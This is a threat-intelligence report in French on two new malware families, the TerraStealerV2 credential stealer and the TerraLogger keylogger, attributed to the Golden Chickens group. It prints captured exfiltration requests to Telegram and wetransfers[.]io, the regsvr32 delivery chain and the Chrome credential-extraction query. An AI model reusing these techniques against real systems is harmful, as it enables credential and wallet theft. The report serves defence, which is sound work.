TerraStealerV2 and TerraLogger: Golden Chickens' New Malware Families Discovered

Executive Summary

Insikt Group a identifié deux nouvelles familles de malwares, TerraStealerV2 et TerraLogger, associées à l’acteur de la menace à visée financière Golden Chickens (également connu sous le nom de Venom Spider). Golden Chickens est connu pour exploiter une plateforme de Malware-as-a-Service (MaaS) utilisée par des groupes de cybercriminels tels que FIN 6, Cobalt Group et Evilnum. Les nouvelles familles, observées entre janvier et avril 2025, semblent être en cours de développement avec pour objectif le vol d’identifiants et l’enregistrement de frappe (keylogging).

TerraStealerV2 est conçu pour collecter des identifiants de navigateur, des données de portefeuilles de cryptomonnaies et des informations sur les extensions de navigateur. Bien qu’il cible la base de données « Login Data » de Chrome pour voler des identifiants, il ne contourne pas les protections Application Bound Encryption (ABE) introduites dans les mises à jour de Chrome après juillet 2024, ce qui indique que le code du malware est obsolète ou toujours en cours de développement. Les données sont exfiltrées vers Telegram et le domaine wetransfers[.]io. Le stealer a été observé au cours de sa distribution sous plusieurs formats, notamment des fichiers LNK, MSI, DLL et EXE, et exploite des utilitaires Windows de confiance comme regsvr32.exe et mshta.exe pour échapper à la détection.

TerraLogger, en revanche, est un enregistreur de frappe autonome. Il utilise un hook de clavier courant de bas niveau pour enregistrer les frappes et écrit les journaux dans des fichiers locaux. Cependant, il n’inclut aucune fonctionnalité d’exfiltration de données ni de communication de commande et de contrôle (C2), ce qui indique qu’il est soit en cours de développement, soit destiné à constituer un élément modulaire de l’écosystème MaaS de Golden Chickens.

L’état actuel de TerraStealerV2 et de TerraLogger suggère que ces deux outils sont toujours en cours de développement actif et n’ont pas encore atteint le niveau de furtivité généralement associé aux outils matures de Golden Chickens. Étant donné l’historique de Golden Chickens dans le développement de malwares conçus pour le vol d’identifiants et les opérations d’accès, il est probable que ces capacités continueront d’évoluer. Il est conseillé aux entreprises de suivre les recommandations d’atténuation fournies dans ce rapport pour réduire le risque de compromission à mesure que ces familles de malwares arrivent à maturité.

Key Findings

• Insikt Group a identifié deux nouvelles familles de malwares, TerraStealerV2 et TerraLogger, attribuées à l’acteur de la menace Golden Chickens. TerraStealerV2 peut dérober les identifiants de navigateur et cibler les portefeuilles de cryptomonnaies, tandis que TerraLogger fonctionne uniquement comme un module de keylogger autonome.
• TerraLogger est la première utilisation d’une capacité d’enregistrement de frappe observée dans un malware développé par Golden Chickens.
• TerraStealerV2 n’est pas encore capable de déchiffrer les identifiants protégés par Chrome ABE, ce qui indique que l’outil est probablement obsolète ou encore en cours de développement.
• Insikt Group a observé dix échantillons distincts de distribution de TerraStealerV2 entre janvier et mars 2025, pour lesquels diverses méthodes de diffusion ont été employées, dont des fichiers MSI, DLL et LNK.

Background

Golden Chickens, également suivi sous l’alias Venom Spider, est un acteur de la menace cyber à visée financière, connu pour exploiter une suite de malwares furtifs et modulaires selon un modèle MaaS. Depuis au moins 2018, la suite MaaS Golden Chickens a été déployée dans des campagnes visant des entreprises à forte valeur par le biais de vecteurs d’ingénierie sociale, notamment des campagnes de spearphishing utilisant de fausses offres d’emploi ou CV. Le malware est exploité par des groupes de cybercriminalité de premier plan, notamment FIN6 et Cobalt Group basés en Russie, ainsi qu’Evilnum basé en Biélorussie, auquel plus de 1,5 milliard de dollars de dommages ont été attribués à travers le monde.

Les composants principaux de la suite MaaS Golden Chickens sont VenomLNK et TerraLoader. Les infections initiales sont généralement l’œuvre de VenomLNK, un fichier de raccourcis Windows malveillant qui exécute TerraLoader, un module de chargement à l’origine du déploiement d’autres malwares Golden Chickens. Ces modules comprennent TerraStealer pour la collecte d’identifiants, TerraTV pour le détournement de TeamViewer, et TerraCrypt pour le déploiement de ransomwares. Parmi les autres familles de malwares attribuées à l’écosystème Golden Chickens, on trouve TerraRecon pour la reconnaissance, TerraWiper pour l’effacement des données et lite_more_eggs, comme illustré dans la figure 1 ci-dessous.

Figure 1 : Familles de malwares Golden Chickens précédemment signalées (source : Quo Intelligence)

Les efforts déployés par l’unité Threat Response d’eSentire pour tracer les campagnes de Golden Chickens l’ont relié à un acteur de la menace connu sous le nom de badbullzvenom, un personnage qui serait exploité conjointement par des individus de Moldavie et de Montréal, au Canada. L’historique de développement de cet acteur montre une progression, passant d’un participant de bas niveau sur un forum à un fournisseur MaaS établi. Les outils développés par Golden Chickens ont été exploités dans plusieurs campagnes, y compris des attaques très médiatisées contre British Airways, Newegg et Ticketmaster UK.

Entre août et octobre 2024, Zscaler ThreatLabz a observé une nouvelle activité attribuée à Golden Chickens, impliquant le déploiement de deux nouvelles familles de malwares identifiées : RevC2 et Venom Loader. Ces outils ont été diffusés via des campagnes VenomLNK, exploitant des leurres d’ingénierie sociale comme des demandes de paiement en cryptomonnaie et la documentation d’API logicielles. La figure 2 illustre la chaîne d’attaque utilisée pour diffuser RevC2.

Figure 2 : Chaîne d’attaque récente de Golden Chickens utilisée pour diffuser RevC2 (source : ZScaler)

Bien que le vecteur de diffusion initial ne soit pas connu, la séquence d’infection commence par l’exécution d’un fichier VenomLNK. Ce fichier télécharge une image leurre conforme au thème de l’appât (dans ce cas, la documentation de l’API du logiciel) et initie l’exécution de RevC2. Plus précisément, le fichier LNK exploite wmic.exe pour appeler regsvr32.exe, lequel charge un payload OCX malveillant hébergé sur un partage de réseau distant.

Analyse technique

Insikt Group a identifié deux nouvelles familles de malwares attribuées au groupe d’acteurs de la menace Golden Chickens. La première, suivie sous le nom de TerraStealerV2, est un stealer ciblant principalement les identifiants de navigateur, les portefeuilles de cryptomonnaies et les extensions de navigateur. La deuxième, identifiée sous le nom de TerraLogger, est un keylogger observé comme un module autonome. Les sous-sections suivantes présentent une analyse technique détaillée de chaque famille de malwares.

TerraStealerV2

Insikt Group a récemment identifié un nouveau stealer attribué à Golden Chickens, téléchargé sur Recorded Future Malware Intelligence le 3 mars 2025. Un chemin d’accès à la base de données de programmes (PDB) intégré à l’échantillon (voir Figure 3) suggère que l’acteur de la menace désigne le malware sous le nom de NOK. Cependant, Insikt Group le suit sous le nom de TerraStealerV2.

Le stealer est destiné à être diffusé sous forme de fichier OCX et exécuté via regsvr32.exe, qui appelle la fonction d’exportation DllRegisterServer. Lors de l’exécution, DllRegisterServer vérifie d’abord que le fichier fourni comporte une extension .ocx et que le nom de fichier se termine par un caractère ou un chiffre spécifique codé en dur (par exemple, 0.ocx). Il vérifie ensuite que le fichier est exécuté par regsvr32.exe avant de poursuivre, comme illustré dans la figure 4 ci-dessous.

Figure 4  Schéma illustrant les vérifications anti-analyse de TerraStealerV2 (source : Recorded Future)

Le malware procède ensuite à la désobfuscation des chaînes à l’aide d’une routine de décodage XOR avec une clé intégrée. Il collecte des informations de base sur l’hôte en appelant les fonctions GetUserNameA et GetComputerNameA pour récupérer les noms de l’utilisateur local et du système. Il détermine ensuite l’adresse IP de la victime en effectuant une requête HTTP vers ifconfig[.]me. Les données collectées sont ensuite exfiltrées via la plateforme de messagerie Telegram vers une chaîne nommée « Noterdam » à l’aide d’un jeton de bot associé à « NoterdanssBot », comme le montre la figure 5.

POST /< redacted >/sendMessage?chat_id=-4652754121 HTTP/1.1
Host: api.telegram.org
Accept: */*
Content-Length: 24014
Content-Type: application/x-www-form-urlencoded

chat_id=-4652754121&text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%2A%2AIP%20Address%3A%2A%2A%20%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-style-type%22%20content%3D%22text%2Fcss%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-script-type%22%20content%3D%22text%2Fjavascript%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-language%22%20content%3D%22en%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22pragma%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22cache-control%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22Get%20my%20IP%20Address%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22keywords%22%20content%3D%22ip%20address%20ifconfig%20ifconfig.me%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22favicon.ico%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22canonical%22%20href%3D%22https%3A%2F%2Fifconfig.me%2F%22%20%2F%3E%0A%20%20%20%20%3Ctitle%3EWhat%20Is%20My%20IP%20Address%3F%20-%20ifconfig.me%3C%2Ftitle%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20href%3D%22.%2Fstatic%2Fstyles%2Fstyle.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffa
      

Le décodage des données POST du message révèle que l’acteur de la menace envoie une notification structurée à un canal Telegram. La notification, comme illustré à la figure 6, inclut une alerte indiquant qu’un nouvel utilisateur a exécuté l’application, le nom d’utilisateur et le nom du système collectés, ainsi que la réponse HTML brute de la requête ifconfig[.]me.

**Nouvel utilisateur a exécuté l'application**
**Nom d'utilisateur :** Admin
**Nom du PC :** UUHJKMQK
**Adresse IP :** <!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="content-style-type" content="text/css" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-language" content="en" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta name="description" content="Get my IP Address" />
      

Le malware énumère ensuite les processus actifs, à la recherche d’instances de chrome.exe. En cas de détection, il tente de mettre fin au processus en utilisant l’API Windows TerminateProcess. Ce comportement est probablement destiné à déverrouiller les fichiers de la base de données du navigateur Chrome afin de garantir un accès sans entrave lors de l’extraction des données. Ensuite, le malware tente d’extraire les identifiants stockés et d’autres données sensibles de Chrome, puis cible des portefeuilles de cryptomonnaies et des extensions de navigateur spécifiques.

L’implémentation du vol de base de données du navigateur Chrome copie la base de données « Login Data » dans C:ProgramData\Temp\LoginData, puis extrait les identifiants sauvegardés à l’aide d’une bibliothèque SQLite liée statiquement pour exécuter la requête SQL SELECT origin_url, username_value, password_value FROM logins. TerraStealerV2 utilise la version 3.46.0 de SQLite, qui est la même version liée statiquement liée dans RevC2, ce qui suggère une possible réutilisation du code ou des pratiques de développement partagées. Cependant, l’implémentation ne contourne pas l’ABE de Chrome, ce qui signifie que les mots de passe collectés ne seront pas déchiffrés pour les hôtes dont les navigateurs basés sur Chrome ont été mis à jour depuis le 24 juillet 2024. Cette limitation suggère que le code du stealer est obsolète ou encore en cours de développement, car les stealers efficaces intègrent généralement des techniques de contournement de l’ABE pour extraire les identifiants déchiffrés des versions modernes de Chrome ou de Microsoft Edge.

Les données de connexion au navigateur exfiltrées et les messages d’information sont écrits dans C:\ProgramData\file.txt et copiés dans %LOCALAPPDATA%\Packages\Bay0NsQIzx\p.txt à la fin des opérations de vol. En cas de détection, les répertoires des extensions de navigateur et des portefeuilles ciblés sont copiés dans %LOCALAPPDATA%\Packages\Bay0NsQIzx, et un message Telegram est envoyé pour indiquer le nombre de portefeuilles crypto trouvés. Le contenu de %LOCALAPPDATA%\Packages\Bay0NsQIzx est ensuite compressé dans une archive nommée output.zip, située dans le même répertoire. L’archive est ensuite exfiltrée vers le bot Telegram et un point de terminaison C2 secondaire est hébergé sur wetransfers[.]io/uplo.php, comme indiqué dans la figure 7. Le domaine wetransfers[.]io a été enregistré le 18 février 2025 via NameCheap, Inc. ; il est actuellement hébergé derrière l’infrastructure Cloudflare.

POST /uplo.php HTTP/1.1
Host: wetransfers.io
Accept: */*
Content-Length: 11252
Content-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl

--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="zipFile"; filename="output.zip"
Content-Type: application/octet-stream

PK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers  2
PK..?.......3.dZ...')...).....................p.txtPK..........3...L.....
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="pcname"

UUHJKMQK
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="username"

Admin
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="totalwallets"

0
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="ip"

<!DOCTYPE html>
<html lang="en">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="content-style-type" content="text/css" />
   <meta http-equiv="content-script-type" content="text/javascript" />
   <meta http-equiv="content-language" content="en" />
   <meta http-equiv="pragma" content="no-cache" />
   <meta http-equiv="cache-control" content="no-cache" />
   <meta name="description" content="Get my IP Address" />
   <meta name="keywords" content="ip address ifconfig ifconfig.me" />

Distribution

Insikt Group a identifié plusieurs mécanismes de diffusion utilisés dans la distribution de TerraStealerV2, y compris des fichiers exécutables (EXE), des bibliothèques de liens dynamiques (DLL), des packages Windows Installer (MSI) et des fichiers de raccourci (LNK). Dans tous les cas observés, la charge utile OCX TerraStealerV2 a été récupérée à partir de l’URL wetransfers[.]io/v.php, une ressource hébergée sur le même domaine utilisé pour l’exfiltration de données, à l’aide de curl ou de PowerShell, puis exécutée via regsvr32.exe (voir Figure 8).

Figure 8 : Chaîne d’attaque d’échantillons de distribution TerraStealerV2 (source : Recorded Future)

Le tableau 1 répertorie des échantillons de distribution, y compris leurs noms de fichiers, leurs horodatages de compilation et les charges utiles TerraStealerV2 correspondantes observées en train d’être déployées par Golden Chickens. Un fichier LNK (SHA-256 : 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a) semble se chevaucher avec le cluster d’activités suivi sous le nom de ClickFix. Dans ce cas, le fichier LNK a déposé une charge utile déguisée en fichier MP4, qui a été exécutée via mshta.exe, une technique conforme aux tactiques précédemment observées dans les campagnes ClickFix.

Tableau 1 : Échantillons utilisés pour distribuer TerraStealerV2 (Source : Recorded Future)

TerraLogger

Insikt Group a identifié un nouveau keylogger associé à Golden Chickens, transféré à Recorded Future Malware Intelligence le 13 janvier 2025. Insikt Group suit cette famille sous le nom de TerraLogger et a identifié cinq échantillons distincts. Quatre échantillons fonctionnent comme prévu et contiennent une chaîne PDB identique tel qu’illustré dans la figure 9 ci-dessous. L’échantillon restant n’inclut pas cette chaîne PDB et utilise le même chemin PDB que TerraStealerV2 (voir Figure 3 ci-dessus). Cette anomalie semble être un test de développeur utilisant la même méthode d’encodage de chaîne que TerraStealerV2. Cependant, elle échoue lors de l’exécution en raison d’un plantage pendant l’initialisation des chaînes liées au keylogger, ce qui empêche le malware d’atteindre son point d’entrée principal.

C:\Users\PC\Downloads\Projector\Projector\x64\Release\Projector.pdb

TerraLogger est généralement diffusé sous forme de fichier OCX et emploie les mêmes vérifications d’exécution initiales que TerraStealerV2. Il est conçu pour s’exécuter via regsvr32.exe, qui appelle la fonction d’exportation DllRegisterServer. À l’exécution, il vérifie d’abord que le fichier fourni comporte l’extension .ocx et que le nom de fichier se termine par un caractère ou un chiffre codé en dur (par exemple, 0.ocx). Il vérifie ensuite qu’il est exécuté par regsvr32.exe avant de continuer. Si les vérifications d’exécution initiales aboutissent, TerraLogger ouvre un descripteur de fichier pour enregistrer les frappes au clavier.

Insikt Group a identifié plusieurs chemins d’accès aux fichiers dans les cinq échantillons identifiés, avec des journaux écrits dans des fichiers tels que a.txt, f.txt, op.txt ou save.txt situés dans le dossier C:\ProgramData. Le malware implémente son keylogger à l’aide d’une technique couramment observée en installant un hook WH_KEYBOARD_LL qui utilise SetWindowsHookExA et enregistre la fonction de rappel fn (illustrée à la figure 10) pour intercepter et traiter les événements de message, permettant ainsi de capturer l’activité du clavier.

Figure 10 : Fonction de rappel du keylogger (Source : Recorded Future)

Les frappes sont écrites dans le fichier journal ouvert dans la fonction mw_log_key. Cette fonction récupère d’abord le titre de la fenêtre d’avant-plan actuelle, puis ajoute un séparateur de ligne suivi des frappes de clavier interceptées. Elle contient une logique pour gérer les caractères spéciaux, tels que les points-virgules, les crochets et les guillemets, et vérifie l’état de la touche Maj pour déterminer le caractère correct à enregistrer. Si un code clé ne correspond à aucune clé spéciale connue, il est écrit au format <KEY-[keycode]>. La figure 11 présente un exemple de fichier journal en résultant.

Figure 11 : Exemple de fichier journal d'un keylogger (Source : Recorded Future)

Le tableau 2 répertorie les cinq échantillons de keylogger TerraLogger identifiés et résume les différences entre les versions. Les horodatages de compilation indiquent que la première version a été créée le 13 janvier 2025 et que l’échantillon le plus récent a été compilé le 1er avril 2025. Ces échantillons reflètent des mises à jour mineures et progressives, suggérant un développement actif. Les changements notables incluent des modifications du chemin d’accès au fichier utilisé pour stocker les journaux de frappe et un changement dans la façon dont les touches spéciales sont représentées – jetons en majuscules entre crochets angulaires (par exemple, , ) ou abréviations en minuscules délimitées par des barres verticales (par exemple, |bck|, |sft|).